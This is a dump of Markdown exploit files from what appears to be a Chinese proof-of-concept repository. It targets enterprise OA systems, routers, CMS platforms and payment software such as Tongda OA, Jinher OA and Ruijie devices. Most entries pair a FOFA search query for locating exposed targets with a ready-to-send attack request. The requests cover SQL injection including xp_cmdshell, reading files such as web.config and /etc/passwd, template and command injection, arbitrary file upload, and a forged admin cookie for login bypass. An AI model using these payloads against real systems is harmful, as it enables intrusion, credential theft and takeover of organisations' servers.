1 | # 通达OAV11.10接口login.php存在SQL注入漏洞
2 |
3 | 通达OAV11.10接口 `/ispirit/interface/login.php ` 存在SQL注入漏洞。
4 |
5 | ## fofa
6 |
7 | ```yaml
8 | app="TDXK-通达OA"
9 | ```
10 |
11 | ## poc
12 |
13 | ```java
14 | POST /ispirit/interface/login.php HTTP/1.1
15 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.855.2 Safari/537.36
16 | Content-Type: application/x-www-form-urlencoded
17 | Host:
18 | Content-Length: 107
19 |
20 | name=123&pass=123&_SERVER[REMOTE_ADDR]=1','10',(select+@`,'`+or+if(1% 3d0,1,(select+~0%2b1))+limit+0,1))--+'
21 | ```
22 |
23 |
--------------------------------------------------------------------------------
/wpoc/金和OA/某和OA-C6-GetSqlData.aspx-SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 某和OA C6-GetSqlData.aspx SQL注入漏洞
2 | ```
3 | OST /C6/Control/GetSqlData.aspx/.ashx
4 | Host: ip:port
5 | User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
6 | Connection: close
7 | Content-Length: 189
8 | Content-Type: text/plain
9 | Accept-Encoding: gzip
10 |
11 | exec master..xp_cmdshell 'ipconfig'
12 |
13 | ```
14 |
--------------------------------------------------------------------------------
/wpoc/金和OA/金和OA-C6-IncentivePlanFulfill.aspx存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 金和OA-C6-IncentivePlanFulfill.aspx存在SQL注入漏洞
2 |
3 |
4 | ## poc
5 | ```
6 | GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1WAITFOR+DELAY+%270:0:6%27--&TVersion=1 HTTP/1.1
7 | Host:
8 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
9 | Connection: close
10 | Cookie: ASP.NET_SessionId=0uha1u0nhrn4meghddjiwu0y
11 | Accept-Encoding: gzip
12 | ```
13 |
--------------------------------------------------------------------------------
/wpoc/金和OA/金和OA-C6-download.jsp任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ## 金和OA-C6-download.jsp任意文件读取漏洞
2 |
3 | 金和OA C6 download.jsp文件存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中的敏感信息
4 |
5 | ## fofa
6 |
7 | ```
8 | app="Jinher-OA"
9 | ```
10 |
11 | ## poc
12 |
13 | ```
14 | /C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=download.asp
15 | /C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config
16 | ```
17 |
18 | 
--------------------------------------------------------------------------------
/wpoc/金和OA/金和OA-C6协同管理平台DBModules.aspx存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | # 金和OA-C6协同管理平台DBModules.aspx存在SQL注入漏洞
2 |
3 | 北京金和网络股份有限公司C6协同管理平台DBModules.aspx存在SQL注入漏洞,攻击者可获取数据库敏感数据。
4 |
5 | ## fofa
6 |
7 | ```yaml
8 | body="c6/Jhsoft.Web.login"
9 | ```
10 |
11 | ## poc
12 |
13 | ```java
14 | GET /C6/JHSoft.Web.WorkFlat/DBModules.aspx/?interfaceID=1;WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
15 | Host: 123.57.26.236
16 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
17 |
18 | ```
19 |
20 |
21 |
22 | ## 漏洞来源
23 |
24 | - https://mp.weixin.qq.com/s/tv_5OOH6CoQDZsZKzu8CDw
--------------------------------------------------------------------------------
/wpoc/金和OA/金和OAC6-GetSqlData.aspx存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 某和OA C6-GetSqlData.aspx SQL注入漏洞
2 | ```
3 | POST /C6/Control/GetSqlData.aspx/.ashx HTTP/1.1
4 | Host: ip:port
5 | User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
6 | Connection: close
7 | Content-Length: 189
8 | Content-Type: text/plain
9 | Accept-Encoding: gzip
10 |
11 | exec master..xp_cmdshell 'ipconfig'
12 | ```
13 |
14 | 
15 |
--------------------------------------------------------------------------------
/wpoc/金和OA/金和OA_SAP_B1Config.aspx未授权访问漏洞.md:
--------------------------------------------------------------------------------
1 | ## 金和OA_SAP_B1Config.aspx未授权访问漏洞
2 |
3 | ## fofa
4 | ```
5 | app="金和网络-金和OA"
6 | ```
7 |
8 | ## poc
9 | ```
10 | /C6/JHsoft./C6/JHsoft.CostEAI/SAP_B1Config.aspx/?manage=1CostEAI/SAP_B1Config.aspx/?manage=1
11 | ```
12 |
13 | 
14 |
--------------------------------------------------------------------------------
/wpoc/金和OA/金和OA_jc6_viewConTemplate.action存在FreeMarker模板注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 金和OA_jc6_viewConTemplate.action存在FreeMarker模板注入漏洞
2 |
3 |
4 | ## poc
5 | ```
6 | POST /jc6/platform/portalwb/portalwb-con-template!viewConTemplate.action HTTP/1.1
7 | Host: your-ip
8 | Accept-Encoding: gzip
9 | Content-Type: application/x-www-form-urlencoded
10 |
11 | moduId=1&code=%253Cclob%253E%2524%257B%2522freemarker.template.utility.Execute%2522%253Fnew%28%29%28%2522ipconfig%2522%29%257D%253C%252Fclob%253E&uuid=1
12 | ```
13 |
--------------------------------------------------------------------------------
/wpoc/金和OA/金和OA任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ## 金和OA任意文件读取漏洞
2 |
3 | ## fofa
4 | ```
5 | app="金和网络-金和OA"
6 | ```
7 |
8 | ## POC
9 | ```
10 | GET /C6/JHSoft.WCF/FunctionNew/FileUploadMessage.aspx?filename=../../../C6/JhSoft.Web.Dossier.JG/JhSoft.Web.Dossier.JG/XMLFile/OracleDbConn.xml HTTP/1.1
11 | Host: 127.0.0.1
12 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
13 | Accept: */*
14 | Connection: Keep-Alive
15 | ```
16 |
--------------------------------------------------------------------------------
/wpoc/金山/金山终端安全系统V9.0 SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 金山终端安全系统V9.0 SQL注入漏洞
2 |
3 | ## fofa查询语法
4 | ```
5 | app="金山终端安全系统V9.0Web控制台"
6 | title=="用户登录-金山终端安全系统V9.0Web控制台"
7 | ```
8 |
9 | ## 影响版本
10 | 金山终端安全系统 V9.0 < V9.SP1.E1008
11 |
12 | ## POC
13 | ```
14 | POST /inter/update_software_info_v2.php HTTP/1.1
15 | Content-Type: application/x-www-form-urlencoded
16 | Host: ip:port
17 | Content-Length: 81
18 |
19 | type=--1E0union/**/se#lect-1E0,2,1,user(),5,6,7,8--&key=123&pageCount=1&curPage=1
20 | ```
21 |
--------------------------------------------------------------------------------
/wpoc/金山/金山终端安全系统V9.0-SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 金山终端安全系统V9.0 SQL注入漏洞
2 |
3 | ## fofa查询语法
4 | ```
5 | app="金山终端安全系统V9.0Web控制台"
6 | title=="用户登录-金山终端安全系统V9.0Web控制台"
7 | ```
8 |
9 | ## 影响版本
10 | 金山终端安全系统 V9.0 < V9.SP1.E1008
11 |
12 | ## POC
13 | ```
14 | POST /inter/update_software_info_v2.php HTTP/1.1
15 | Content-Type: application/x-www-form-urlencoded
16 | Host: ip:port
17 | Content-Length: 81
18 |
19 | type=--1E0union/**/se#lect-1E0,2,1,user(),5,6,7,8--&key=123&pageCount=1&curPage=1
20 | ```
21 |
--------------------------------------------------------------------------------
/wpoc/金盘/金盘微信管理平台download.jsp任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | # 金盘微信管理平台download.jsp任意文件读取漏洞
2 |
3 | 金盘微信管理平台download.jsp任意文件读取漏洞,通过该漏洞读取数据库配置文件等
4 |
5 | ## fofa
6 |
7 | ```javascript
8 | title=="微信管理后台"
9 | ```
10 |
11 | ## poc
12 |
13 | ```javascript
14 | GET /mobile/pages/admin/tools/file/download.jsp?items=/WEB-INF/web.xml HTTP/1.1
15 | Host:
16 | ```
17 |
18 | 
--------------------------------------------------------------------------------
/wpoc/金石工程项目管理系统/金石工程项目管理系统TianBaoJiLu.aspx存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 金石工程项目管理系统TianBaoJiLu.aspx存在SQL注入漏洞
2 |
3 | ## fofa
4 | ```
5 | body="金石工程项目管理系统"
6 | ```
7 |
8 | ## 先获取cookie(响应包Set-Cookie)
9 | ```
10 | GET / HTTP/1.1
11 | Host:
12 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
13 | Connection: close
14 | Accept-Encoding: gzip, deflate
15 | Content-Type: application/x-www-form-urlencoded
16 | ```
17 |
18 | ### sqlmap跑注入
19 | ```
20 | sqlmap -u "http://ip/query/shigongjihuajindu/TianBaoJiLu.aspx?id=1" --batch --cookie 'ASP.NET_SessionId=pcqx2zs4gsnqprd5cvhtodmk'
21 | ```
22 |
--------------------------------------------------------------------------------
/wpoc/金蝶/金蝶EAS_pdfviewlocal任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ## 金蝶EAS_pdfviewlocal任意文件读取漏洞
2 |
3 | ## fofa
4 | ```
5 | app="Apusic应用服务器"
6 | ```
7 |
8 | ## poc
9 | ```
10 | /plt_document/fragments/content/pdfViewLocal.jsp?path=C:/Windows/win.ini
11 | ```
12 | 
13 |
--------------------------------------------------------------------------------
/wpoc/金蝶/金蝶云星空 CommonFileserver 任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ## 金蝶云星空 CommonFileserver 任意文件读取漏洞
2 | ```
3 | GET /CommonFileServer/c:/windows/win.ini
4 | ```
5 |
--------------------------------------------------------------------------------
/wpoc/金蝶/金蝶云星空-CommonFileserver-任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ## 金蝶云星空 CommonFileserver 任意文件读取漏洞
2 | ```
3 | GET /CommonFileServer/c:/windows/win.ini
4 | ```
5 |
--------------------------------------------------------------------------------
/wpoc/铭飞/铭飞CMS list接口存在SQL注入.md:
--------------------------------------------------------------------------------
1 | ## 铭飞CMS list接口存在SQL注入
2 |
3 | ## fofa
4 | ```
5 | body="铭飞MCMS" || body="/mdiy/formData/save.do" || body="static/plugins/ms/1.0.0/ms.js"
6 | ```
7 |
8 | ## poc
9 | ```
10 | http://127.0.0.1/cms/content/list?categoryId=1%27%20and%20updatexml(1,concat(0x7e,md5(123),0x7e),1)%20and%20%271
11 | ```
12 | 
13 |
--------------------------------------------------------------------------------
/wpoc/铭飞/铭飞CMS-list接口存在SQL注入.md:
--------------------------------------------------------------------------------
1 | ## 铭飞CMS list接口存在SQL注入
2 |
3 | ## fofa
4 | ```
5 | body="铭飞MCMS" || body="/mdiy/formData/save.do" || body="static/plugins/ms/1.0.0/ms.js"
6 | ```
7 |
8 | ## poc
9 | ```
10 | http://127.0.0.1/cms/content/list?categoryId=1%27%20and%20updatexml(1,concat(0x7e,md5(123),0x7e),1)%20and%20%271
11 | ```
12 | 
13 |
--------------------------------------------------------------------------------
/wpoc/锁群管理系统/锁群管理系统存在逻辑缺陷漏洞.md:
--------------------------------------------------------------------------------
1 | # 锁群管理系统存在逻辑缺陷漏洞
2 | 锁群管理系统存在逻辑缺陷漏洞,攻击者可利用该漏洞获取敏感信息。
3 |
4 | ## fofa
5 |
6 | ```javascript
7 | title=="锁群管理系统 V2.0"
8 | ```
9 |
10 | 
11 |
12 | ## poc
13 | cookie中添加如下内容,即可进入后台
14 |
15 | ```javascript
16 | Cookie: ASP.NET_SessionId=evadd1jksrepp4gtbgockcbi; username=admin; power=1; powerName=%e8%b6%85%e7%ba%a7%e7%ae%a1%e7%90%86%e5%91%98; code=admin
17 | ```
18 |
19 | 
20 |
21 |
--------------------------------------------------------------------------------
/wpoc/锐捷/RG-UAC锐捷统一上网行为管理与审计系统存在远程代码执行漏洞.md:
--------------------------------------------------------------------------------
1 | ## RG-UAC锐捷统一上网行为管理与审计系统存在远程代码执行漏洞
2 |
3 | ## fofa
4 | ```
5 | app="Ruijie-RG-UAC"
6 | ```
7 |
8 |
9 | ## poc
10 | ```
11 | /view/vpn/autovpn/online_check.php?peernode= | `echo PD9waHAgcGhwaW5mbygpOw== | base64 -d > 1.php`
12 |
13 | ```
14 |
15 | 
16 |
--------------------------------------------------------------------------------
/wpoc/锐捷/锐捷 NBR 路由器 fileupload.php 任意文件上传漏洞.md:
--------------------------------------------------------------------------------
1 | ## 锐捷 NBR 路由器 fileupload.php 任意文件上传漏洞
2 |
3 | ```
4 | POST /ddi/server/fileupload.php?uploadDir=../../321&name=123.php HTTP/1.1
5 | Host:
6 | Accept: text/plain, */*; q=0.01
7 | Content-Disposition: form-data; name="file"; filename="111.php"
8 | Content-Type: image/jpeg
9 |
10 |
11 | ```
12 |
--------------------------------------------------------------------------------
/wpoc/锐捷/锐捷-NBR-路由器-fileupload.php-任意文件上传漏洞.md:
--------------------------------------------------------------------------------
1 | ## 锐捷 NBR 路由器 fileupload.php 任意文件上传漏洞
2 |
3 | ```
4 | POST /ddi/server/fileupload.php?uploadDir=../../321&name=123.php HTTP/1.1
5 | Host:
6 | Accept: text/plain, */*; q=0.01
7 | Content-Disposition: form-data; name="file"; filename="111.php"
8 | Content-Type: image/jpeg
9 |
10 |
11 | ```
12 |
--------------------------------------------------------------------------------
/wpoc/锐捷/锐捷RG-NBS2026G-P交换机WEB管理ping.htm未授权访问漏洞.md:
--------------------------------------------------------------------------------
1 | # 锐捷RG-NBS2026G-P交换机WEB管理ping.htm未授权访问漏洞
2 |
3 | 未验证漏洞
4 |
5 | ## poc
6 |
7 | ```yaml
8 | /safety/ping.htm
9 | ```
10 |
11 |
--------------------------------------------------------------------------------
/wpoc/锐捷/锐捷RG-UAC统一上网行为管理与审计系统管理员密码泄露.md:
--------------------------------------------------------------------------------
1 | ## 锐捷RG-UAC统一上网行为管理与审计系统管理员密码泄露
2 |
3 | ## 影响版本
4 | ```
5 | 锐捷RG-UAC统一上网行为管理审计系统
6 | ```
7 |
8 | ## fofa
9 | ```
10 | title="RG-UAC登录页面" && body="admin"
11 | ```
12 |
13 | ## 漏洞复现
14 | 右键查看源代码 搜索 admin 即可找到admin md5密码
15 | 
16 |
--------------------------------------------------------------------------------
/wpoc/锐捷/锐捷网络无线AC命令执行.md:
--------------------------------------------------------------------------------
1 | ## 锐捷网络无线AC命令执行
2 |
3 | 
4 |
5 | ## poc
6 | ```
7 | POST /web_action.do HTTP/1.1
8 | Host:
9 | Content-Type: application/x-www-form-urlencoded
10 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
11 |
12 | action=shell&command=ls
13 | ```
14 |
15 | 
16 |
--------------------------------------------------------------------------------
/wpoc/飞企互联/⻜企互联loginService任意登录.md:
--------------------------------------------------------------------------------
1 | ## ⻜企互联loginService任意登录
2 |
3 | ## fofa
4 | ```
5 | app="FE-协作平台"
6 | app="飞企互联-FE企业运营管理平台"
7 | ```
8 |
9 | ## poc
10 | ```
11 | /loginService.fe?op=D
12 | ```
13 | 
14 |
15 | 接着访问main.jsp
16 | 
17 |
--------------------------------------------------------------------------------
/wpoc/飞企互联/飞企互联 FE 业务协作平台存在参数文件读取漏洞 .md:
--------------------------------------------------------------------------------
1 | ## 飞企互联 FE 业务协作平台存在参数文件读取漏洞
2 |
3 | ## fofa
4 | ```
5 | app="飞企互联-FE企业运营管理平台"
6 | ```
7 |
8 | ## poc
9 | ```
10 | /servlet/ShowImageServlet?imagePath=../web/fe.war/WEB-INF/classes/jdbc.properties&print
11 | ```
12 |
--------------------------------------------------------------------------------
/wpoc/飞企互联/飞企互联-FE-业务协作平台存在参数文件读取漏洞-.md:
--------------------------------------------------------------------------------
1 | ## 飞企互联 FE 业务协作平台存在参数文件读取漏洞
2 |
3 | ## fofa
4 | ```
5 | app="飞企互联-FE企业运营管理平台"
6 | ```
7 |
8 | ## poc
9 | ```
10 | /servlet/ShowImageServlet?imagePath=../web/fe.war/WEB-INF/classes/jdbc.properties&print
11 | ```
12 |
--------------------------------------------------------------------------------
/wpoc/飞企互联/飞企互联-FE企业运营管理平台ProxyServletUti存在任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ## 飞企互联-FE企业运营管理平台ProxyServletUti存在任意文件读取漏洞
2 |
3 | 飞企互联FE业务协作平台中的ProxyServletUti接口存在任意文件读取漏洞。攻击者可以通过构造特定请求,读取服务器上的敏感文件。
4 |
5 |
6 |
7 | ## fofa
8 | ```
9 | app="飞企互联-FE企业运营管理平台"
10 | ```
11 |
12 | ## poc
13 | ```
14 | /ProxyServletUtil?url=file:///c:/Windows/win.ini
15 | ```
16 |
--------------------------------------------------------------------------------
/wpoc/飞企互联/飞企互联-FE企业运营管理平台treeXml.jsp存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 飞企互联-FE企业运营管理平台treeXml.jsp存在SQL注入漏洞
2 |
3 | 飞企互联-FE企业运营管理平台 treeXml.jsp 接口存在SQL注入漏洞,未经授权攻击者可通过该漏洞获取数据库敏感信息。
4 |
5 | ## fofa
6 |
7 | ```
8 | app="FE-协作平台"
9 | ```
10 |
11 | ## poc
12 |
13 | ```
14 | GET /sys/treeXml.js%70?menuName=1';WAITFOR+DELAY+'0:0:5'--&type=function HTTP/1.1
15 | Host: your-ip
16 | ```
17 |
18 | 
--------------------------------------------------------------------------------
/wpoc/飞企互联/飞企互联-FE企业运营管理平台登录绕过漏洞.md:
--------------------------------------------------------------------------------
1 | ## 飞企互联-FE企业运营管理平台登录绕过漏洞
2 |
3 | ## fofa
4 | ```
5 | app="飞企互联-FE企业运营管理平台"
6 | ```
7 |
8 | ## poc
9 | ```
10 | http://your-ip/2.ln?SYS_LINK=77507068764957484a5067777862714f457a66574871642f4330574c76717868394a35496d37416c497951724f33446f51486375685a5a2b31684938472b7056
11 |
12 | ```
13 | 直接拼接url即可进入后台
14 |
15 | 
16 |
--------------------------------------------------------------------------------
/wpoc/魔方网表/魔方网表mailupdate.jsp接口存在任意文件上传漏洞.md:
--------------------------------------------------------------------------------
1 | ## 魔方网表mailupdate.jsp接口存在任意文件上传漏洞
2 |
3 |
4 | ## fofa
5 | ```
6 | icon_hash="694014318"
7 |
8 | ```
9 |
10 |
11 | ## poc
12 | ```
13 | GET /magicflu/html/mail/mailupdate.jsp?messageid=/../../../test1.jsp&messagecontent=%3C%25+out.println%28%22tteesstt1%22%29%3B%25%3E HTTP/1.1
14 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
15 | Accept-Encoding: gzip, deflate
16 | Accept: */*
17 | Connection: close
18 | Host: 127.0.0.1
19 | ```
20 |
--------------------------------------------------------------------------------
/wpoc/龙腾码支付/龙腾码支付payservicecurl任意文件读取.md:
--------------------------------------------------------------------------------
1 | # 龙腾码支付payservicecurl任意文件读取
2 |
3 | # 一、漏洞简介
4 | 龙腾码支付管理系统存在未授权的任意文件读取漏洞
5 |
6 | # 二、影响版本
7 | + 龙腾码支付
8 |
9 | # 三、资产测绘
10 | + fofa`body="/epaydoc/epaydoc.php"`
11 |
12 | # 四、漏洞复现
13 | ```plain
14 | GET /pay/service/curl?url=file:///etc/passwd HTTP/1.1
15 | ```
16 |
--------------------------------------------------------------------------------